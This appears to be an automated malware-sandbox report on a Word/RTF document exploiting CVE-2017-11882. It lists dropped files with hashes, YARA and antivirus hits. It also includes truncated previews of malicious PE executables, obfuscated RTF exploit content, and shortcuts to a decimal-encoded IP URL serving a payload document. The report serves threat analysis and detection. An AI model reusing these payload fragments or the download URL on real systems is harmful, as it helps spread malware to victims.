                                                                                QUOTATION REQUEST.xlsGet hashmaliciousBrowse
                                                                                • 3.232.242.170
                                                                                LISCRs invoice.xlsGet hashmaliciousBrowse
                                                                                • 3.232.242.170
                                                                                Ordenar-CVE2-53033.xlsGet hashmaliciousBrowse
                                                                                • 3.232.242.170
                                                                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.5845.25121.rtfGet hashmaliciousBrowse
                                                                                • 3.232.242.170
                                                                                Remittance Slip 103.xlsGet hashmaliciousBrowse
                                                                                • 3.232.242.170
                                                                                No context
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):0.28833820887190037
                                                                                Encrypted:false
                                                                                SSDEEP:48:I3B4RBJOjrxbyvBW0Jj01OAkHFrqVG1OygyUH:KOLJSrcc0C1OAkpq0OygyUH
                                                                                MD5:ADF8BF7F0F2D9A41DCDE781C703083EF
                                                                                SHA1:F990B0A208A22D7C6D9780EF46576D79AB3C9307
                                                                                SHA-256:0E97582D133BCB220BB3A414ED92876967EE05280665F69BE02E0E91704C7057
                                                                                SHA-512:1CC451FED63702F80E67D3C649473150EE5CDF8183B9FB615990DC0CBAC9D5386595A2116F56E2516F0790A8C5CE84FF2CD8D2E40EEA9D072D336A68A6474D6D
                                                                                Malicious:false
                                                                                Preview:......M.eFy...z....b.AF...O..S,...X.F...Fa.q..............................o8.d.H.....$[:.........%.....C.E.f.....A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):0.6722061135155806
                                                                                Encrypted:false
                                                                                SSDEEP:96:KeCy5e1vrmK+y7c5DYoGPRPLVknwr27NJ7V/9PZJnAXnA:Ni6HhDBGPdV
                                                                                MD5:B26C773BAD778B98A9917E7B07AD66CD
                                                                                SHA1:9224FACC4BF0F48309CE5105BF35BAB3D2D3C30E
                                                                                SHA-256:21E8535EE67BA3E3B6F734AAC04C7065FD8262F869C2CB4591D25142D9D1E6BE
                                                                                SHA-512:696F3962451A4D40E3B98C3300BC376F6FA4616E2908A0CD7AE12A23FF6D1ADC39C672A6FB0E283A6E7FCF383C97502993E8C12987B4597ABABE36F9B2D5CB85
                                                                                Malicious:false
                                                                                Preview:......M.eFy...z+....K..}..(.S,...X.F...Fa.q............................K..r...M....u.3..........4.b.O.ubt.p.i.S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):114
                                                                                Entropy (8bit):3.885000588826675
                                                                                Encrypted:false
                                                                                SSDEEP:3:yVlgsRlzSflml1X3shZIlUGuZPSRYklclYDZ276:yPblzcmlplGZ6nGlYt22
                                                                                MD5:567071EB40165C10940F345CE4BEAC86
                                                                                SHA1:1430252046B5AED73B7AD76F5B8333EB3518902D
                                                                                SHA-256:92C0063455352B5BA3D53A05D7FA70B1CC35EBE618522EB61ABF086B27BAF08E
                                                                                SHA-512:5420A2775B26624A091277D471DB417277040DCBB35E0027E7106A493234DCC58EDCD32ECE68D24E704D2C9E3391FEF932142A36662F450BCD2F7CB8ABD1A484
                                                                                Malicious:false
                                                                                Preview:..H..@....b..q....]F.S.D.-.{.2.3.2.0.3.A.9.7.-.0.2.2.8.-.4.0.D.F.-.9.3.F.F.-.8.F.0.C.4.C.D.E.2.4.B.9.}...F.S.D..
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):0.28615656518567456
                                                                                Encrypted:false
                                                                                SSDEEP:48:I3cRB0ZqyF3J2Sd55kysuuh5NL8fuL98WZr+HfUno00o0PH:KcLXC3Pau6kWL98Wl+HfUoW2H
                                                                                MD5:213E5C0EF60F524231F8DC08981CF8D4
                                                                                SHA1:BE1C9525A9729CEC1BF66AB152082D3068E362D3
                                                                                SHA-256:639AD8036A0E9378AEA7A0A2F6D849C65CE793F10C3574E06928AF91F3E68325
                                                                                SHA-512:DC8123F7FBC17B27C6580BDC65C402F603DD59BCF6B70C298E4827A836D88258D4656ACA6577E53499A8EA7B92055029D579FB01CE6F6D1DD87EE9E3663D1ACA
                                                                                Malicious:false
                                                                                Preview:......M.eFy...z......@.Rj..B.KS,...X.F...Fa.q............................u..f...D.g;x.!N..........N.aIN.A.PQ...f..A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):0.2218719797571494
                                                                                Encrypted:false
                                                                                SSDEEP:48:I3ZIUrBn4lrFn0c8parSC33sFa86J8JfTpkSD0/rP2JHDr5rP2JHDrO:KeC8GW6D+PmhPmO
                                                                                MD5:02A5FB2B30E7042E838A23D9F3BEA290
                                                                                SHA1:82E7FC751054C7C0DDEE8BDFC92A37760D2AF6D0
                                                                                SHA-256:833E7A3E7DEC47B0DFC8E0C07134A19480102686353FE9FD5F30F5B94B8DF36D
                                                                                SHA-512:C9101EC965CA30F197AFD61C6C4D96F73C12BB1F10D9C557690CBF2E7B54E90894EB33F92E172C40C9F3AC692EEF84D7966C763A13B679809098D497AEDD3561
                                                                                Malicious:false
                                                                                Preview:......M.eFy...z.].....N..Z....S,...X.F...Fa.q............................~.(...LF.^................W..)K...ar..pP>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):114
                                                                                Entropy (8bit):4.01012920730466
                                                                                Encrypted:false
                                                                                SSDEEP:3:yVlgsRlzxkFhZHlnMSLwKjE3Il9glj87276:yPblzx0+Sc2iIlWju22
                                                                                MD5:16CD3259F12067F160DF2F1AC12002A6
                                                                                SHA1:042C58665795DDC3B6505D81CDA50DC6B2EC3E31
                                                                                SHA-256:1E342D57EBDF680591BB2DDF859919F7F60CF88742EDA9AE288C411FAAD4BAE9
                                                                                SHA-512:ED17F7A5465D16AD9B6D24C9EA6ABCB707F0AF4F9B42EEFFDC2AAC05FE12F167C95B8E3DCA6846854CF97867F43DD1654F9C4531770BEAA1AD57B80627EF1119
                                                                                Malicious:false
                                                                                Preview:..H..@....b..q....]F.S.D.-.{.A.E.E.D.8.4.B.F.-.5.B.B.3.-.4.D.C.1.-.9.1.0.2.-.F.C.6.1.2.5.3.F.9.6.7.A.}...F.S.D..
                                                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):192000
                                                                                Entropy (8bit):6.9670159394895705
                                                                                Encrypted:false
                                                                                SSDEEP:3072:uZdNpvK0wWVUOK5qGma938JLYuFksJ8c:uZogUwG78Vys+c
                                                                                MD5:FCAA733B76E66945EF88308FD504C0DC
                                                                                SHA1:5BFF6AF218AD04BED92C6FFD0A83D488B5F5DFAA
                                                                                SHA-256:177AC53BD8B7B2C9D58E869FA7E76D801DA7A32176E8EFFA10A90F920FD5450E
                                                                                SHA-512:2A51BCDFDF6B05FBAC49BC2778D901D7DE7EF1603D9F9B9C619EB2D2A8635110A496D8F5DC8694162A062AB704406CF75929CF02F78339E804096A16D377E54D
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 35%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L."..."..."......"....<."..RY..."...#.'."......"......"......".Rich..".........................PE..L...[.fb.............................m............@..........................@.................................................P........7...........................................................;..@...............<............................text...*........................... ..`.data....F..........................@....rsrc....7.......8..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):18888
                                                                                Entropy (8bit):4.004497578554549
                                                                                Encrypted:false
                                                                                SSDEEP:384:GNzkNRo78FmsLkjX9ya4gqwtwSsBUhfxsGWzKKf:WIDmsLkz9yaDniSsm3sGEKKf
                                                                                MD5:6DE99355BA0021764335235576BDAECF
                                                                                SHA1:7826EE62BDF3F46086C67DE8BBC4927F7E67D915
                                                                                SHA-256:1F7D565D004117E2DA6DAF58C115E1234C48488327264DE0BAFE277FDEB65D91
                                                                                SHA-512:E4CD7E48C8B4005EC93A6596269DAF191481DE622B704E60FA3C038082EB2D921A1997EE73F5BD1F75EF73B4294170AB3852F7075440FBA7855E4DEECC388857
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: SUSP_INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].doc, Author: ditekSHen
                                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0000_000000_00000[1].doc, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                Preview:{\rt.........{\mcSp337887461 \.}.{\9541841103@1.0-.<!:!*%:|@>+,1!&5/[]~>*?/,~.03=?937.7?]=.4.,9$:4)-?_[[2>!%66_$_[4-|$6?|]7?;4?>7?3|(23)(9?%9%<-1@?+9.!::8`.+.?;5~(^734;!7.[~,?%:82+?/.?`$;%(*%9`*0*?0.3]|*?~[?[9*8[]4$^/!8$?$?23;4..9'#..2(|_?.-/.5['102'.!<8%.`7.%%*6~?^7#30'?./~`@]64[3.;#+=(=&3527?].+,(@'72_/,]2?8.#:/^-2++-;0$;,<$9?;7?%|[>^@6[#79||9)$..%6..?[9.4?./4?.0[3,-.,<5?</87~;?[7%?!.1?`.~$^46[^3,@:=^4__!9([?*,/($5:'|+.&73<=[2.5:#@|5.>'%%1(]?7+6@+?.7=@+^.7.4>??|5%0??1;%(`11)!3.@?<^+6<.&09<.^1).^-=(@[5=19&?,7@4?*?)-,-._??<,#!+6&]?*~7),#(.0^.;~#1!@+]?/*$%%91#1?%.5'??*?/.@.6@,+7%<.?,_6*0.|.)?>~*<2328<&/.?+@?'!2:)7=_?]?0.'5:^;+.?/^&-(57`2@+16?76]=#1,3/?.+-63>?$&|3|,@%,?1;/%5|64%%,?17?)?`?1&27?1/&^*.'?@%%&^?0.8+?+(*?,'],%<%._$-/1?,*`!@7<?2^]%$-:-.9?6=?`.`;35/<`'.14??.@?_$0%(|*-?1-`$07&$:'(-.([$+>6<3=<.+/.$#*|._.<.9?^+:;-306@.8(~.?|/08.4)'#.4?1%_?1`?<9>+~%._>&|))80/)|:2?!|6&'<,?00,,40<['2=@,!5%5)'__<_?||8?_%.|5.?;'.;(;]!=%&%?(-!7]?%#?(~7%.=>?>6*5/?1?|?`:.?<.`]6#7;8=#[58.@_=/9?2'2%2%6/==.8_
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):18888
                                                                                Entropy (8bit):4.004497578554549
                                                                                Encrypted:false
                                                                                SSDEEP:384:GNzkNRo78FmsLkjX9ya4gqwtwSsBUhfxsGWzKKf:WIDmsLkz9yaDniSsm3sGEKKf
                                                                                MD5:6DE99355BA0021764335235576BDAECF
                                                                                SHA1:7826EE62BDF3F46086C67DE8BBC4927F7E67D915
                                                                                SHA-256:1F7D565D004117E2DA6DAF58C115E1234C48488327264DE0BAFE277FDEB65D91
                                                                                SHA-512:E4CD7E48C8B4005EC93A6596269DAF191481DE622B704E60FA3C038082EB2D921A1997EE73F5BD1F75EF73B4294170AB3852F7075440FBA7855E4DEECC388857
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: SUSP_INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.doc, Author: ditekSHen
                                                                                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F43FFB53.doc, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                Preview:{\rt.........{\mcSp337887461 \.}.{\9541841103@1.0-.<!:!*%:|@>+,1!&5/[]~>*?/,~.03=?937.7?]=.4.,9$:4)-?_[[2>!%66_$_[4-|$6?|]7?;4?>7?3|(23)(9?%9%<-1@?+9.!::8`.+.?;5~(^734;!7.[~,?%:82+?/.?`$;%(*%9`*0*?0.3]|*?~[?[9*8[]4$^/!8$?$?23;4..9'#..2(|_?.-/.5['102'.!<8%.`7.%%*6~?^7#30'?./~`@]64[3.;#+=(=&3527?].+,(@'72_/,]2?8.#:/^-2++-;0$;,<$9?;7?%|[>^@6[#79||9)$..%6..?[9.4?./4?.0[3,-.,<5?</87~;?[7%?!.1?`.~$^46[^3,@:=^4__!9([?*,/($5:'|+.&73<=[2.5:#@|5.>'%%1(]?7+6@+?.7=@+^.7.4>??|5%0??1;%(`11)!3.@?<^+6<.&09<.^1).^-=(@[5=19&?,7@4?*?)-,-._??<,#!+6&]?*~7),#(.0^.;~#1!@+]?/*$%%91#1?%.5'??*?/.@.6@,+7%<.?,_6*0.|.)?>~*<2328<&/.?+@?'!2:)7=_?]?0.'5:^;+.?/^&-(57`2@+16?76]=#1,3/?.+-63>?$&|3|,@%,?1;/%5|64%%,?17?)?`?1&27?1/&^*.'?@%%&^?0.8+?+(*?,'],%<%._$-/1?,*`!@7<?2^]%$-:-.9?6=?`.`;35/<`'.14??.@?_$0%(|*-?1-`$07&$:'(-.([$+>6<3=<.+/.$#*|._.<.9?^+:;-306@.8(~.?|/08.4)'#.4?1%_?1`?<9>+~%._>&|))80/)|:2?!|6&'<,?00,,40<['2=@,!5%5)'__<_?||8?_%.|5.?;'.;(;]!=%&%?(-!7]?%#?(~7%.=>?>6*5/?1?|?`:.?<.`]6#7;8=#[58.@_=/9?2'2%2%6/==.8_
                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 4, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 4
                                                                                Category:dropped
                                                                                Size (bytes):77824
                                                                                Entropy (8bit):1.1340767975888557
                                                                                Encrypted:false
                                                                                SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                                                                MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                                                                SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                                                                SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                                                                SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                                                Category:dropped
                                                                                Size (bytes):40960
                                                                                Entropy (8bit):0.7798653713156546
                                                                                Encrypted:false
                                                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Windows\explorer.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):123904
                                                                                Entropy (8bit):4.924485657900922
                                                                                Encrypted:false
                                                                                SSDEEP:768:Y5997FKxvnWI06ezN3maHiYNwN8Agw3nZPHbzYKE:Y5evWIw2CAVZDzs
                                                                                MD5:2E1406B0FA96C7F11EA16768E01B2FD1
                                                                                SHA1:DFC79012394CFA1B68C4C079F82CA18720B13E6D
                                                                                SHA-256:AE8DC43802152F82A460CD67CEDCAD7D7F9B505AC617BB090D64629E47169A65
                                                                                SHA-512:EEC4EC19DA5D7DC095A65965E4B40B578979AA34C4F5A3829BAD1488E754EE8910A2FF2DC7DD1DED41BBDA9249FD7DB7C122258BB50E593DE56CA5E8C9541425
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&|c............................V0... ...@....@.. .......................@............`..................................0..J....@....................... ....................................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B................<0......H........#................................................................(....*..(....*v+.+.r...p+.*.+.o....+.(....+...v+.+.r_..p+.*.+.o....+.(....+...Rru..p+......*(....+.....0..f.......+=..-.i.-.+6+7+8+=+B.,.+@+A+B....-.(.......1..,....(.....t....*.+..+..+.o....+.o....+..+..+..+.(....+....0..V........,-+5t....+5~....-........s.........~....+...+ &.-..-..,.*(....+.o....+.(...++.o....+....0..O........,'+(+-+2~....-........s.........~....+.+.+ *(....+.(....+.o....+.(...++..+.
                                                                                Process:C:\Windows\SysWOW64\explorer.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, file counter 9, database pages 7, 1st free page 7, free pages 2, cookie 0xd, schema 4, UTF-8, version-valid-for 9
                                                                                Category:dropped
                                                                                Size (bytes):28672
                                                                                Entropy (8bit):0.9650411582864293
                                                                                Encrypted:false
                                                                                SSDEEP:48:T2loMLOpEO5J/KdGU1jX983Gul4kEBrvK5GYWgqRSESXh:inNww9t9wGAE
                                                                                MD5:903C35B27A5774A639A90D5332EEF8E0
                                                                                SHA1:5A8CE0B6C13D1AF00837AA6CA1AA39000D4EB7CF
                                                                                SHA-256:1159B5AE357F89C56FA23C14378FF728251E6BDE6EEA979F528DB11C4030BE74
                                                                                SHA-512:076BD35B0D59FFA7A52588332A862814DDF049EE59E27542A2DA10E7A5340758B8C8ED2DEFE78C5B5A89EE54C19A89D49D2B86B49BF5542D76C1D4A378B40277
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ ..........................................................................C..........g...N......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):123904
                                                                                Entropy (8bit):4.924485657900922
                                                                                Encrypted:false
                                                                                SSDEEP:768:Y5997FKxvnWI06ezN3maHiYNwN8Agw3nZPHbzYKE:Y5evWIw2CAVZDzs
                                                                                MD5:2E1406B0FA96C7F11EA16768E01B2FD1
                                                                                SHA1:DFC79012394CFA1B68C4C079F82CA18720B13E6D
                                                                                SHA-256:AE8DC43802152F82A460CD67CEDCAD7D7F9B505AC617BB090D64629E47169A65
                                                                                SHA-512:EEC4EC19DA5D7DC095A65965E4B40B578979AA34C4F5A3829BAD1488E754EE8910A2FF2DC7DD1DED41BBDA9249FD7DB7C122258BB50E593DE56CA5E8C9541425
                                                                                Malicious:true
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&|c............................V0... ...@....@.. .......................@............`..................................0..J....@....................... ....................................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc....... ......................@..B................<0......H........#................................................................(....*..(....*v+.+.r...p+.*.+.o....+.(....+...v+.+.r_..p+.*.+.o....+.(....+...Rru..p+......*(....+.....0..f.......+=..-.i.-.+6+7+8+=+B.,.+@+A+B....-.(.......1..,....(.....t....*.+..+..+.o....+.o....+..+..+..+.(....+....0..V........,-+5t....+5~....-........s.........~....+...+ &.-..-..,.*(....+.o....+.(...++.o....+....0..O........,'+(+-+2~....-........s.........~....+.+.+ *(....+.(....+.o....+.(...++..+.
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):0.02567431129777181
                                                                                Encrypted:false
                                                                                SSDEEP:6:I3DPcGFt/KqT9vxggLRuvtlefDRXv//4tfnRujlw//+GtluJ/eRuj:I3DPlFNKqTRstlA1vYg3J/
                                                                                MD5:E73CB59035345B5D2A2D30BC0E907DEE
                                                                                SHA1:33BF2A8CE41A72F5730006E67E85FD5051903316
                                                                                SHA-256:A5C75DE8F7CFA3A843E4C4C226113DA82329082CB8F2FFFF92B0B7E3D394AAC8
                                                                                SHA-512:92EA01FCEECCE4CBC3F36186D1646952F26B00129A53F2C4CEF9643D01C25A3928E4DC777723E7BB099673245E6CC3974CE7F1D38EA8B22C06E5104937472C77
                                                                                Malicious:false
                                                                                Preview:......M.eFy...z....b.AF...O..S,...X.F...Fa.q............................U3{.gO.E....S.0..........%.....C.E.f.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):131072
                                                                                Entropy (8bit):0.025354453197270293
                                                                                Encrypted:false
                                                                                SSDEEP:6:I3DPcsrQtvxggLR8tkggPCapRXv//4tfnRujlw//+GtluJ/eRuj:I3DP+wtkggPbvYg3J/
                                                                                MD5:78C145E779277AED8FE9D3BFAFD38509
                                                                                SHA1:BD06F566DE1A9676C45C3E20CE1309A7BD02A24D
                                                                                SHA-256:D4DD59881D4ED102DC66F6EE074536DD09663D312D7CC55DDCF859012758A302
                                                                                SHA-512:F994DCEEF37BEAE34B4EA252C0D44398E1BB5B502C038DEF66A873E39D418570F5ED23261E257F92243D71208EFAD22FA37809CE856C9560BA00687F579C710F
                                                                                Malicious:false
                                                                                Preview:......M.eFy...z......@.Rj..B.KS,...X.F...Fa.q................................2..K.F..............N.aIN.A.PQ...f......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<http://3236135985/000000_0000000_000000_000000_0000000_000000_000000/>), ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):95
                                                                                Entropy (8bit):3.433124779585069
                                                                                Encrypted:false
                                                                                SSDEEP:3:HRAbABGQYm/iWFdfv+d/Ad/+d/+d/Ad/+d/Dn:HRYFVm/82ww2wtn
                                                                                MD5:586DBAE8F6FC8A78AA9BF638D064107D
                                                                                SHA1:28198DFF557C29A7B803D3DB0F4693485A1B068C
                                                                                SHA-256:29DC28DD3A2081A8746BC41F705C9FD9B6F96B2FC1235B268C4A6204DFDCA3AD
                                                                                SHA-512:FCD68B22471149AF640892C9B90A1FEEFC04239985E97E23F35E24CB8BBAD91DF79331C9E7B244873E5AFFB66887F437F38609EEAC00927AC15498548FE2087C
                                                                                Malicious:false
                                                                                Preview:[InternetShortcut]..URL=http://3236135985/000000_0000000_000000_000000_0000000_000000_000000/..
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<http://3236135985/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc>), ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):116
                                                                                Entropy (8bit):3.260217181172065
                                                                                Encrypted:false
                                                                                SSDEEP:3:HRAbABGQYm/iWFdfv+d/Ad/+d/+d/Ad/+d/Oda/+dh4vn:HRYFVm/82ww2wglm
                                                                                MD5:52F7B862B95C887519CFF97AA73C8576
                                                                                SHA1:2FD398343DCF0E0858E1D90DCDD3C928D0667E47
                                                                                SHA-256:89414ACA98CE668FD55A3B0441963D7FE16335114883AA23137A8B0FCE98C260
                                                                                SHA-512:EB7092C10694D06A578A553856743BCE9AA46A84B9D3ED791F2114460FAC2D925001F231F2E105FCD4E3A5C376B20EE3558ED6F483ED8D5C254797B577229457
                                                                                Malicious:false
                                                                                Preview:[InternetShortcut]..URL=http://3236135985/000000_0000000_000000_000000_0000000_000000_000000/0000_000000_00000.doc..
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:53 2022, mtime=Tue Mar 8 15:45:53 2022, atime=Tue Nov 22 12:08:08 2022, length=10364, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):1039
                                                                                Entropy (8bit):4.559141172209322
                                                                                Encrypted:false
                                                                                SSDEEP:24:8X9n/XThOMFqf/xfju1MJe6lrnRu1ODv3qVu7D:8tn/XT4iIxfa1MJb1nU1lV0D
                                                                                MD5:713F236A545B4AE87A62CD0DE7FD2940
                                                                                SHA1:397C945ED2034F5C87D8D8787DAE9CDE3EE96BD7
                                                                                SHA-256:F259F86308D27A20A5694E0A8C50BAD42ED97E1D6DF3AF3A5559DDD96D6B7118
                                                                                SHA-512:58BB4CCD13B39D9BBF5AE2CDA01ED14BBD9FF114DA92715973DC1C99DCA087CD13DCB2DEDDFB0AE3EF916D588A12365F9637718D1180C7636433C4CBF3126380
                                                                                Malicious:false
                                                                                Preview:L..................F.... ..."m...3.."m...3..$..ws...|(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....p.2.|(..vU.i .DRAFTC~1.DOC..T......hT..hT..*...r.....'...............D.r.a.f.t. .C.o.n.t.r.a.c.t...d.o.c.x.......}...............-...8...[............?J......C:\Users\..#...................\\390120\Users.user\Desktop\Draft Contract.docx.*.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.r.a.f.t. .C.o.n.t.r.a.c.t...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......390120..........D_....3N...W...9G..N..... ...
                                                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                File Type:Generic INItialization configuration [doc]
                                                                                Category:modified
                                                                                Size (bytes):188
                                                                                Entropy (8bit):4.153231389632057
                                                                                Encrypted:false
                                                                                SSDEEP:3:bDuMJl9Ad/Ad/+d/+d/Ad/+d/+FDTUWJdeQtENFmKlXvtp2mX1V/V6X/+dht6MWO:bCr2ww2wI+dDXmKlXvtprV62p0mKlXv0
                                                                                MD5:29A815655B587AAB017F7C9559DAF816
                                                                                SHA1:B4D536019712EB48F2AEE71687F5D96574244C21
                                                                                SHA-256:722982F1D3108C14693298C1AA0A65DC591EB66D49E837A8F3236C8157B0E4DD
                                                                                SHA-512:2CD7625F80DABA91108623013C647C8C7DD6D49E57CB7B16F42E43C275F721CE73938C87C213229488AF3EBB7340E2355222A393740B2A8E2ABBA68539579D45
